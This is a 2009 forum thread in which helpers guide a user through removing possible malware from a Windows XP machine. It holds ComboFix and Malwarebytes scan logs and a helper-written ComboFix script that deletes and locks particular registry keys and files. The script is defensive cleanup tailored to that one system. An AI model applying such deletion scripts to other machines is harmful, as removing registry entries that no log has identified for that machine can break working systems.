c:\program files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
c:\program files\Common Files\LightScribe\LSSrvc.exe
c:\windows\system32\lvhidsvc.exe
c:\program files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
c:\program files\NetLimiter 2 Pro\nlsvc.exe
c:\program files\Hewlett-Packard\Digital Imaging\bin\hpqste08.exe
c:\program files\CDBurnerXP\NMSAccessU.exe
c:\windows\system32\HPZipm12.exe
c:\program files\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe
c:\program files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
c:\program files\HHVcdV5Sys\VC5SecS.exe
c:\program files\NetLimiter 2 Pro\NLClient.exe
c:\program files\Alwil Software\Avast4\ashMaiSv.exe
c:\program files\Alwil Software\Avast4\ashWebSv.exe
c:\windows\system32\lxcccoms.exe
c:\program files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
.
**************************************************************************
.
Completion time: 2009-06-20 15:22 - machine was rebooted
ComboFix-quarantined-files.txt 2009-06-20 13:22
ComboFix2.txt 2009-06-20 06:46
ComboFix3.txt 2009-01-13 13:05

Pre-Run: 616 050 688 bájt szabad
Post-Run: 610 746 368 bájt szabad

Current=3 Default=3 Failed=2 LastKnownGood=4 Sets=1,2,3,4
384





Malwarebytes' Anti-Malware 1.38
Adatbázis verzió: 2314
Windows 5.1.2600 Szervizcsomag 2

2009.06.20. 19:05:25
mbam-log-2009-06-20 (19-05-07).txt

Vizsgálat típusa: Gyorsvizsgálat
Átvizsgált objektumok: 95775
Eltelt idő: 5 minute(s), 26 second(s)

Fertőzött memóriafolyamatok: 0
Fertőzött memória modulok: 0
Fertőzött rendszerleíró kulcsok: 0
Fertőzött rendszerleíró értékek: 0
Fertőzött rednszerleíró elemek: 2
Fertőzött mappák: 0
Fertőzött fájlok: 0

Fertőzött memóriafolyamatok:
(Nem észleltem rosszindulatú elemeket)

Fertőzött memória modulok:
(Nem észleltem rosszindulatú elemeket)

Fertőzött rendszerleíró kulcsok:
(Nem észleltem rosszindulatú elemeket)

Fertőzött rendszerleíró értékek:
(Nem észleltem rosszindulatú elemeket)

Fertőzött rednszerleíró elemek:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\UpdatesDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.

Fertőzött mappák:
(Nem észleltem rosszindulatú elemeket)

Fertőzött fájlok:
(Nem észleltem rosszindulatú elemeket)


this key turned the Windows firewall back on (I use Comodo)


Sat Jun 20, 2009 18:34
platinum member

Joined: Sat Feb 03, 2007 11:36
Posts: 528
Post
OK! Thanks! :!:


Sat Jun 20, 2009 15:56
soul of the forum

Joined: Sun Jun 24, 2007 10:18
Posts: 6679
Location: Revuca.S.k>>Slovakia, I can't write Hungarian well, that's why what you see looks like this,
Post
Hi Sergej,
anything is possible,
Start > Run, paste in control userpasswords2, OK
and there you can set it back the way it was
pilaka
Open Notepad > Start > Run > type notepad
And paste in the red [green] text
Code:
KILLALL::
File::
c:\windows\S06C0D312.tmp
RegNull::
[HKEY_USERS\S-1-5-21-117609710-1078081533-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{6BC31396-740D-B4B5-B08B-BC74AF917057}*]
[HKEY_USERS\S-1-5-21-117609710-1078081533-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{A873A6C7-2DF7-2ABE-BD1E-352FFC8F3EDB}*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{47629D4B-2AD3-4e50-B716-A66C15C63153}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{604BB98A-A94F-4a5c-A67C-D8D3582C741C}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{74554CCD-F60F-4708-AD98-D0152D08C8B9}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{684373FB-9CD8-4e47-B990-5A4466C16034}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{7EB537F9-A916-4339-B91B-DED8E83632C0}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{948395E8-7A56-4fb1-843B-3E52D94DB145}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{AC3ED30B-6F1A-4bfc-A4F6-2EBDCCD34C19}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{DE5654CA-EB84-4df9-915B-37E957082D6D}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{E39C35E8-7488-4926-92B2-2F94619AC1A5}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{EACAFCE5-B0E2-4288-8073-C02FF9619B6F}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{F8F02ADD-7366-4186-9488-C21CB8B3DCEC}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{FEE45DE2-A467-4bf9-BF2D-1411304BCD84}\InprocServer32*]
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Installer\UserData\LocalSystem\Components\?•€|˙˙˙˙"•€|ţ»Ów*]
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Reinstall\hŃ*.Poc]
RegLock::
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\ProgID]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\Programmable]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\TypeLib]
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\VersionIndependentProgID]

Now > in Notepad, the first menu, File > in the top left corner > 4th line > Save as....
In place of the .txt file name put this >CFScript.txt<, below it set >All files<
at the very top > Desktop <, click the button to save. And now do this:
Image
ComboFix will start on its own and may restart and finish the scan. Post here what it then gives you
:arrow: download the Malwarebytes program, do a quick scan, post the log here,
http://www.download.com/Malwarebytes-An ... tag=button


Sat Jun 20, 2009 13:46
gold member

Joined: Thu Jan 01, 2009 20:34
Posts: 294
Post
http://www.virustotal.com/hu/analisis/9 ... 1245498467
http://www.virustotal.com/hu/analisis/7 ... 1245497833

I started pasting the links here ...but in short: not a single detection on any of them........


Sat Jun 20, 2009 13:01
platinum member

Joined: Sat Feb 03, 2007 11:36
Posts: 528
Post
Hi stell!
I have a freshly reinstalled machine, it already has XP SP3 on it. How can it be that I always had to click the user icon to log in, and now all of a sudden it logged in by itself after a restart? Could it be a boot virus? :shock:


This post has been edited 1 time, last by rozumnij sergej nyikolaje on Sat Jun 20, 2009 13:17.



Sat Jun 20, 2009 12:38
gold member

Joined: Thu Jan 01, 2009 20:34
Posts: 294
Post
I'm doing it, but VirusTotal is overloaded...............


Sat Jun 20, 2009 12:20
soul of the forum

Joined: Sun Jun 24, 2007 10:18
Posts: 6679
Location: Revuca.S.k>>Slovakia, I can't write Hungarian well, that's why what you see looks like this,
Post
VIRUSTOTALu
test these one by one on VirusTotal, and post the links from the tests here,
Quote:
c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_35bf2b9f.exe
c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_7e834bd2.exe
c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_7e8021d5.exe
c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_737a1221.exe
a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_3b7137e6.exe
c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_6ff64da0.exe
c:\windows\system32\DRIVERS\vbev5mp.sys


Sat Jun 20, 2009 11:38
gold member

Joined: Thu Jan 01, 2009 20:34
Posts: 294
Post
after the scan, Fix-downadup immediately offered a Microsoft security update and, if it had been able to, it would have downloaded it too.


Sat Jun 20, 2009 8:06
gold member

Joined: Thu Jan 01, 2009 20:34
Posts: 294
Post
I also tried F-Secure's downadup tool; it started, and it scanned folders on C: and wrote "clean" next to them ....but when it said "system scanning", nothing happened apart from the cursor blinking (for 20 minutes)

Of course I did things in the order you described.


Sat Jun 20, 2009 8:02
gold member

Joined: Thu Jan 01, 2009 20:34
Posts: 294
Post
ComboFix 09-06-18.02 - PALI 009.06.20. 8:28.1 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1250.36.1038.18.1023.451 [GMT 2:00]
Running from: c:\documents and settings\PALI\Asztal\ComboFix.exe
AV: avast! antivirus 4.8.1335 [VPS 090618-0] *On-access scanning disabled* (Updated) {7591DB91-41F0-48A3-B128-1A293FD8233D}
FW: COMODO Firewall Pro *enabled* {043803A3-4F86-4ef6-AFC5-F6E02A79969B}

WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\windows\system32\ATIODCLI.exe
c:\windows\system32\ATIODE.exe
c:\documents and settings\PALI\Local Settings\Temporary Internet Files\CD2000Setup.exe
c:\windows\IE4 Error Log.txt
c:\windows\system32\0ecf8441.dll

.
((((((((((((((((((((((((( Files Created from 2009-05-20 to 2009-06-20 )))))))))))))))))))))))))))))))
.

2009-06-19 17:18 . 2009-06-19 17:18 26624 ----a-w- c:\windows\system32\drivers\fsbts.sys
2009-06-19 17:17 . 2009-06-20 06:07 -------- d-----w- c:\documents and settings\Rendszergazda\Local Settings\Application Data\Adobe
2009-06-19 09:53 . 2009-06-19 10:01 -------- d-----w- C:\rsit
2009-06-19 08:29 . 2009-06-19 08:29 -------- d-----w- c:\documents and settings\PALI\Application Data\Convivea
2009-06-19 08:29 . 2009-04-10 16:40 118784 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\scripts\x.exe
2009-06-19 08:29 . 2008-03-28 08:07 20992 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\languages\compare.exe
2009-06-19 08:29 . 2008-03-28 08:02 60928 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\scripts\update.exe
2009-06-19 08:29 . 2007-07-11 17:43 24557 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\scripts\special.exe
2009-06-19 08:29 . 2003-08-19 03:06 80896 ----a-w- c:\documents and settings\PALI\Application Data\Convivea\Bit_Che\scripts\x.dll
2009-06-19 08:29 . 2009-06-19 08:29 -------- d-----w- c:\program files\Bit Che
2009-06-18 06:03 . 2008-12-11 06:38 159600 ----a-w- c:\windows\system32\drivers\pctgntdi.sys
2009-06-18 06:02 . 2009-04-03 09:18 130936 ----a-w- c:\windows\system32\drivers\PCTCore.sys
2009-06-18 06:02 . 2008-12-18 10:16 73840 ----a-w- c:\windows\system32\drivers\PCTAppEvent.sys
2009-06-18 06:02 . 2009-06-18 06:03 -------- d-----w- c:\program files\Common Files\PC Tools
2009-06-18 06:02 . 2008-12-10 09:36 64392 ----a-w- c:\windows\system32\drivers\pctplsg.sys
2009-06-18 06:02 . 2009-06-18 06:02 -------- d-----w- c:\documents and settings\All Users\Application Data\PC Tools
2009-06-17 17:36 . 2009-06-18 06:02 51328 ----a-w- c:\windows\system32\drivers\inspect.sys
2009-06-17 17:36 . 2009-06-18 06:02 75520 ----a-w- c:\windows\system32\drivers\cmdmon.sys
2009-06-14 10:09 . 2009-06-14 10:09 -------- d-----w- c:\program files\xyr0x Security
2009-06-14 09:37 . 2009-04-10 13:37 2023768 ----a-w- c:\windows\system32\rapid.dll
2009-06-14 09:37 . 2009-04-08 12:05 16384 ---ha-w- c:\windows\system32\shell.exe
2009-06-14 09:37 . 2009-04-10 22:34 151552 ----a-w- c:\windows\system32\Rapid.exe
2009-06-14 09:37 . 2009-04-08 19:26 49 ---ha-w- c:\windows\system32\run.bat
2009-06-13 16:23 . 2009-06-14 20:24 -------- d-----w- c:\temp\{9F5FBC24-EFE2-4f90-B498-EC0FB7D47D15}
2009-06-12 15:29 . 2009-06-12 15:29 -------- d-----w- c:\program files\Driver Cleaner Pro
2009-06-10 20:37 . 2009-06-10 20:37 -------- d-----w- c:\documents and settings\PALI\Application Data\Ashampoo
2009-06-10 19:25 . 2009-06-10 19:25 -------- d-----w- c:\documents and settings\All Users\Application Data\ATI
2009-06-10 19:12 . 2009-03-16 14:04 11563008 ----a-w- c:\windows\system32\atioglxx.dll
2009-06-10 19:12 . 2009-03-16 13:40 49664 ----a-w- c:\windows\system32\atimpc32.dll
2009-06-10 19:12 . 2009-03-16 13:35 45056 ----a-w- c:\windows\system32\aticalrt.dll
2009-06-10 19:12 . 2009-03-16 13:35 131072 ----a-w- c:\windows\system32\atiadlxx.dll
2009-06-10 19:12 . 2009-03-16 13:34 45056 ----a-w- c:\windows\system32\aticalcl.dll
2009-06-10 19:12 . 2009-03-16 13:33 3264512 ----a-w- c:\windows\system32\aticaldd.dll
2009-06-10 19:12 . 2009-03-03 13:56 118784 ----a-w- c:\windows\system32\atibtmon.exe
2009-06-10 19:12 . 2009-02-26 05:40 99856 ----a-w- c:\windows\system32\drivers\AtiHdmi.sys
2009-06-10 18:42 . 2009-06-19 10:41 664 ----a-w- c:\windows\system32\d3d9caps.dat
2009-06-10 18:12 . 2005-05-07 10:43 69632 ------r- c:\windows\Alcmtr.exe
2009-06-08 20:31 . 2009-06-15 16:41 -------- d-----w- c:\program files\The FilmMachine
2009-06-08 20:19 . 2006-08-05 07:02 49152 ------r- c:\windows\system32\ChCfg.exe
2009-06-08 20:19 . 2006-07-25 08:14 86016 ------r- c:\windows\SoundMan.exe
2009-06-08 20:19 . 2006-05-20 10:04 2879488 ------r- c:\windows\SkyTel.exe
2009-06-08 20:19 . 2007-01-06 05:32 1191936 ------r- c:\windows\RtlUpd.exe
2009-06-08 20:19 . 2006-05-08 08:35 9709568 ------r- c:\windows\RTLCPL.exe
2009-06-08 20:19 . 2007-02-03 10:57 4474368 ------r- c:\windows\system32\drivers\RtkHDAud.sys
2009-06-08 20:19 . 2007-02-03 10:54 16116224 ------r- c:\windows\RTHDCPL.exe
2009-06-08 20:19 . 2006-10-15 09:42 2157568 ------r- c:\windows\MicCal.exe
2009-06-08 20:19 . 2006-05-08 08:26 2808832 ------r- c:\windows\alcwzrd.exe
2009-06-08 20:19 . 2009-06-10 18:12 -------- d-----w- c:\program files\Realtek
2009-06-08 20:19 . 2007-01-16 08:54 520192 ------r- c:\windows\RtlExUpd.dll
2009-06-05 21:53 . 2009-06-05 21:53 -------- d-----w- c:\documents and settings\PALI\Local Settings\Application Data\PCHealth
2009-06-05 21:50 . 2009-06-05 21:50 -------- d-----w- c:\documents and settings\PALI\Local Settings\Application Data\ATI
2009-06-05 21:50 . 2009-06-05 21:50 -------- d-----w- c:\documents and settings\PALI\Application Data\ATI
2009-06-05 21:48 . 2009-06-05 21:48 0 ----a-w- c:\windows\ativpsrm.bin
2009-06-05 21:33 . 2009-06-05 21:33 -------- d-----w- c:\program files\My Company Name
2009-06-05 21:27 . 2009-06-05 21:27 9158 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{89DE67AD-08B8-4699-A55D-CA5C0AF82BF3}\ARPPRODUCTICON.exe
2009-06-05 21:27 . 2009-06-05 21:27 -------- d-----w- c:\program files\Common Files\ATI Technologies
2009-06-05 21:26 . 2006-12-28 03:44 84992 ----a-r- c:\windows\system32\drivers\AtiHdAud.sys
2009-06-05 21:22 . 2009-03-16 14:17 307200 ----a-w- c:\windows\system32\atiiiexx.dll
2009-06-05 21:22 . 2009-03-16 14:27 442368 ----a-w- c:\windows\system32\ATIDEMGX.dll
2009-06-05 21:22 . 2008-02-19 13:37 887724 ----a-r- c:\windows\system32\ativva6x.dat
2009-06-05 21:22 . 2008-02-19 13:37 3107788 ----a-r- c:\windows\system32\ativva5x.dat
2009-06-05 21:21 . 2008-02-19 13:37 3107788 ----a-r- c:\windows\system32\ativvaxx.dat
2009-06-05 09:55 . 2009-02-23 15:39 184394 ----a-w- c:\windows\system32\atiicdxx.dat
2009-06-05 09:54 . 2009-06-10 19:20 -------- d-----w- c:\program files\ATI Technologies
2009-06-01 14:08 . 2009-06-01 14:08 -------- d-----w- c:\program files\FDRLab
2009-05-29 08:03 . 2009-05-29 08:03 -------- d-----w- c:\windows\system32\3Planesoft
2009-05-29 08:03 . 2009-05-29 08:03 -------- d-----w- c:\program files\3Planesoft Screensaver Manager
2009-05-29 08:03 . 2009-05-29 08:03 -------- d-----w- c:\program files\Tropical Fish 3D Screensaver

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-06-20 06:40 . 2008-11-01 20:52 -------- d-----w- c:\program files\cFosSpeed
2009-06-20 06:26 . 2008-11-21 17:19 82464 ----a-w- c:\windows\system32\perfc040.dat
2009-06-20 06:26 . 2008-11-21 17:19 414914 ----a-w- c:\windows\system32\perfh040.dat
2009-06-20 06:26 . 2004-08-18 12:00 449586 ----a-w- c:\windows\system32\perfh00E.dat
2009-06-20 06:26 . 2004-08-18 12:00 100660 ----a-w- c:\windows\system32\perfc00E.dat
2009-06-20 06:24 . 2008-12-24 11:42 -------- d---a-w- c:\documents and settings\All Users\Application Data\TEMP
2009-06-19 16:43 . 2008-11-01 11:53 -------- d-----w- c:\documents and settings\PALI\Application Data\uTorrent
2009-06-18 17:34 . 2008-12-24 11:42 -------- d-----w- c:\program files\Spyware Doctor
2009-06-18 10:23 . 2008-03-16 17:56 -------- d-----w- c:\program files\FairUse Wizard 2
2009-06-18 06:53 . 2008-03-16 19:54 -------- d-----w- c:\program files\Common Files\Elecard
2009-06-17 17:36 . 2009-01-13 19:32 -------- d-----w- c:\program files\Comodo
2009-06-16 07:58 . 2008-03-03 17:36 -------- d-----w- c:\documents and settings\PALI\Application Data\Vso
2009-06-14 20:52 . 2008-03-13 17:56 -------- d-----w- c:\program files\Avidemux 2.4
2009-06-13 21:38 . 2009-03-10 08:57 249856 ------w- c:\windows\Setup1.exe
2009-06-13 21:37 . 2009-03-10 08:57 73216 ----a-w- c:\windows\ST6UNST.EXE
2009-06-13 20:27 . 2009-04-07 19:22 -------- d-----w- c:\program files\MooGUI
2009-06-13 17:10 . 2008-11-01 15:11 -------- d-----w- c:\program files\Lx_cats
2009-06-10 21:18 . 2009-06-10 18:24 196608 ----a-w- c:\windows\system32\drivers\nStandard.bin
2009-06-10 20:37 . 2008-03-17 08:56 -------- d-----w- c:\program files\Ashampoo
2009-06-10 18:24 . 2009-01-01 14:45 -------- d-----w- c:\program files\ASUS
2009-06-10 18:24 . 2008-03-01 20:34 -------- d--h--w- c:\program files\InstallShield Installation Information
2009-06-09 16:55 . 2008-11-12 20:33 -------- d-----w- c:\program files\XRECODE
2009-06-09 14:00 . 2008-03-14 10:24 -------- d-----w- c:\program files\ChrisTV
2009-06-08 20:39 . 2008-03-02 21:04 -------- d-----w- c:\program files\AviSynth 2.5
2009-06-08 20:11 . 2008-03-02 19:04 -------- d-----w- c:\program files\MoBiMouse
2009-06-08 20:07 . 2008-11-22 15:47 -------- d-----w- c:\documents and settings\All Users\Application Data\InstallShield
2009-06-08 20:07 . 2008-03-06 18:03 -------- d-----w- c:\documents and settings\PALI\Application Data\InstallShield
2009-06-08 19:34 . 2008-03-03 17:42 -------- d-----w- c:\program files\Real Alternative
2009-06-06 20:45 . 2009-02-08 12:21 -------- d-----w- c:\documents and settings\PALI\Application Data\Free Download Manager
2009-06-06 20:45 . 2008-11-01 12:39 -------- d---a-w- c:\program files\USDownloader - Cap
2009-06-06 13:44 . 2008-03-26 22:46 -------- d-----w- c:\documents and settings\PALI\Application Data\Simple Sudoku
2009-06-06 13:40 . 2009-02-21 14:59 -------- d-----w- c:\program files\RapidSolution
2009-06-06 13:26 . 2009-02-21 14:44 -------- d-----w- c:\program files\Daniusoft
2009-06-04 22:40 . 2008-03-01 20:52 106496 ----a-w- c:\windows\DUMP691a.tmp
2009-05-11 22:41 . 2009-05-11 22:41 -------- d-----w- c:\program files\ProPoster
2009-05-11 22:31 . 2008-03-01 22:01 97016 ----a-w- c:\documents and settings\PALI\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2009-05-11 22:31 . 2009-05-11 22:31 -------- d-----w- c:\program files\Poster Forge
2009-05-11 22:13 . 2008-03-16 19:47 -------- d-----w- c:\program files\Sorenson Media
2009-05-11 22:12 . 2009-05-11 22:12 10134 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{38F48AED-66D8-464C-993E-C7296C7A199B}\ARPPRODUCTICON.exe
2009-05-11 22:11 . 2009-05-11 22:11 -------- d-----w- c:\program files\BIAS
2009-05-08 07:53 . 2009-05-08 07:36 -------- d-----w- c:\program files\PhotoFiltre Studio X
2009-05-08 07:37 . 2009-05-08 07:36 -------- d-----w- c:\documents and settings\PALI\Application Data\PhotoFiltre Studio X
2009-05-04 09:01 . 2008-11-27 10:57 135773 ----a-w- c:\windows\HPHins12.dat
2009-04-27 20:17 . 2009-03-05 21:21 -------- d-----w- c:\program files\abgx360
2009-04-07 19:22 . 2009-04-07 19:22 25214 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_35bf2b9f.exe
2009-04-07 19:22 . 2009-04-07 19:22 23558 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_7e834bd2.exe
2009-04-07 19:22 . 2009-04-07 19:22 23558 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_7e8021d5.exe
2009-04-07 19:22 . 2009-04-07 19:22 23558 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_737a1221.exe
2009-04-07 19:22 . 2009-04-07 19:22 23558 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_3b7137e6.exe
2009-04-07 19:22 . 2009-04-07 19:22 22486 ----a-r- c:\documents and settings\PALI\Application Data\Microsoft\Installer\{DADD9750-EB4B-4030-8F67-5EAE5390513D}\_6ff64da0.exe
2009-03-23 08:27 . 2009-03-23 08:27 747566 ----a-w- c:\windows\system32\abgx360.exe
2009-03-02 21:50 . 2009-03-02 21:49 24 --sh--w- c:\windows\S06C0D312.tmp
.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="c:\windows\system32\ctfmon.exe" [2004-08-18 15360]
"MSMSGS"="c:\program files\Messenger\Msmsgs.exe" [2008-06-02 1660952]
"DAEMON Tools"="c:\program files\DAEMON Tools\daemon.exe" [2007-04-03 165784]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"UserFaultCheck"="c:\windows\system32\dumprep 0 -u" [X]
"RecSche"="c:\program files\TVR\RecSche.exe" [2004-05-10 454656]
"ChrisTV Agent"="c:\program files\ChrisTV\ChrisTV_Agent.exe" [2005-05-02 187392]
"PinnacleDriverCheck"="c:\windows\system32\\PSDrvCheck.exe" [2004-03-10 406016]
"amd_dc_opt"="c:\program files\AMD\Dual-Core Optimizer\amd_dc_opt.exe" [2007-07-23 77824]
"lxccmon.exe"="c:\program files\Lexmark 3300 Series\lxccmon.exe" [2005-07-20 192512]
"FaxCenterServer"="c:\program files\Lexmark Fax Solutions\fm3032.exe" [2005-07-12 299008]
"cFosSpeed"="c:\program files\cFosSpeed\cFosSpeed.exe" [2007-10-17 854992]
"avast!"="c:\progra~1\ALWILS~1\Avast4\ashDisp.exe" [2009-02-05 81000]
"VC5Player"="c:\program files\HHVcdV5Sys\VC5Play.exe" [2003-11-07 176128]
"UnlockerAssistant"="c:\program files\Unlocker\UnlockerAssistant.exe" [2006-05-06 6656]
"CClipboard"="c:\program files\ComfortClipboard\CClipboard.exe" [2008-06-07 2843136]
"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2009-01-14 136600]
"CloneCDTray"="c:\program files\SlySoft\CloneCD\CloneCDTray.exe" [2006-09-28 57344]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2008-09-06 413696]
"ASUSGamerOSD"="c:\program files\ASUS\GamerOSD\GamerOSD.exe" [2007-10-23 380928]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2009-03-17 61440]
"LXCCCATS"="c:\windows\System32\spool\DRIVERS\W32X86\3\LXCCtime.dll" [2005-07-20 73728]
"COMODO Firewall Pro"="c:\program files\Comodo\Firewall\CPF.exe" [2009-06-18 1115728]
"SkyTel"="SkyTel.EXE" - c:\windows\SkyTel.exe [2006-05-20 2879488]
"RTHDCPL"="RTHDCPL.EXE" - c:\windows\RTHDCPL.exe [2007-02-03 16116224]

c:\documents and settings\All Users\Start Menu\Programs\Indˇt˘pult\
HP Digital Imaging Monitor.lnk - c:\program files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe [2006-2-19 288472]
hpoddt01.exe.lnk - c:\program files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe [2003-4-6 28672]
InterVideo WinCinema Manager.lnk - c:\program files\InterVideo\Common\Bin\WinCinemaMgr.exe [2008-12-14 167936]

[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= "c:\program files\SUPERAntiSpyware\SASSEH.DLL" [2008-05-13 77824]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon]
2008-12-22 10:05 356352 ----a-w- c:\program files\SUPERAntiSpyware\SASWINLO.dll

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ autocheck autochk *\0autocheck ??$\0autocheck T?M??

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sdauxservice]
@=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sdcoreservice]
@=""

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusDisableNotify"=dword:00000001
"UpdatesDisableNotify"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecAntiVirus]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\SymantecFirewall]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\concept design\\onlineTV 3\\onlineTV.exe"=
"c:\\Program Files\\Pinnacle\\Studio 10\\programs\\RM.exe"=
"c:\\Program Files\\Pinnacle\\Studio 10\\programs\\Studio.exe"=
"c:\\Program Files\\Pinnacle\\Studio 10\\programs\\PMSRegisterFile.exe"=
"c:\\Program Files\\Pinnacle\\Studio 10\\programs\\umi.exe"=
"c:\\Program Files\\uTorrent\\uTorrent.exe"=
"c:\\Program Files\\eMule\\emule.exe"=
"c:\\WINDOWS\\system32\\lxcccoms.exe"=
"c:\\WINDOWS\\system32\\spool\\drivers\\w32x86\\3\\lxccpswx.exe"=
"c:\\Program Files\\VoipCheapCom\\VoipCheapCom.exe"=
"c:\\Program Files\\Messenger\\Msmsgs.exe"=
"c:\\Program Files\\Java\\jre6\\bin\\javaw.exe"=
"c:\\Program Files\\Java\\jre6\\bin\\java.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"5121:TCP"= 5121:TCP:messenger
"21858:TCP"= 21858:TCP:BitComet 21858 TCP
"21858:UDP"= 21858:UDP:BitComet 21858 UDP
"26636:TCP"= 26636:TCP:BitComet 26636 TCP
"26636:UDP"= 26636:UDP:BitComet 26636 UDP
"7387:TCP"= 7387:TCP:messenger
"3389:TCP"= 3389:TCP:@xpsp2res.dll,-22009
"1253:TCP"= 1253:TCP:messenger
"135:TCP"= 135:TCP:TCP Port 135
"5000:TCP"= 5000:TCP:TCP Port 5000
"5001:TCP"= 5001:TCP:TCP Port 5001
"5002:TCP"= 5002:TCP:TCP Port 5002
"5003:TCP"= 5003:TCP:TCP Port 5003
"5004:TCP"= 5004:TCP:TCP Port 5004
"5005:TCP"= 5005:TCP:TCP Port 5005
"5006:TCP"= 5006:TCP:TCP Port 5006
"5007:TCP"= 5007:TCP:TCP Port 5007
"5008:TCP"= 5008:TCP:TCP Port 5008
"5009:TCP"= 5009:TCP:TCP Port 5009
"5010:TCP"= 5010:TCP:TCP Port 5010
